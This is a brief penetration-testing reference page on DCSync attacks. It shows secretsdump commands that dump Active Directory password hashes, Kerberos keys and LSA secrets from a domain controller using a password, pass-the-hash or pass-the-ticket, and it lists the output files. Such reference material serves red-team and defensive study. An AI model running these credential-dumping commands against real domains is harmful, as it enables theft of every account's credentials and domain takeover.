DCSync
How to find sensitive data using a DCSync.
Last updated
How to find sensitive data using a DCSync.
Last updated
A DCSync is similar to dumping a NTDS.dit file. However, rather than copying and extracting data from NTDS.dit, DCSync uses Windows APIs with the domain controller to replicate the domains data.
To conduct this account, a domain administrator is requried or a user with the privileges: DS-Replication-Get-Changes
and DS-Replication-Get-Changes-All
.
The easiest way to perform a DCSync is to use secretsdump.
secretsdump.py performs various techniques to dump password hashes and secrets.
DCSync using a plaintext password
secretsdump -outputfile 'data' <DOMAIN>/<USER>:<PASSWORD>@<DOMAINCONTROLLER>
DCSync using Pass-the-Hash
secretsdump -outputfile 'data' -hashes <LMhash>:<NThash> <DOMAIN>/<USER>@<DOMAINCONTROLLER>
DCSync using Pass-the-Ticket
secretsdump -k -outputfile 'data' <DOMAIN>/<USER>@<DOMAINCONTROLLER>
The secretsdump script will output the following files from the DCSync:
.ntds
LM and NT password hashes which can be used with hash cracking.
.cleartext
Passwords stored using reversible encryption
.kerberos
Kerberos keys (DES, AES128 and AES256)
.sam
Domain controller's SAM secrets
.secrets
Domain controller's LSA secrets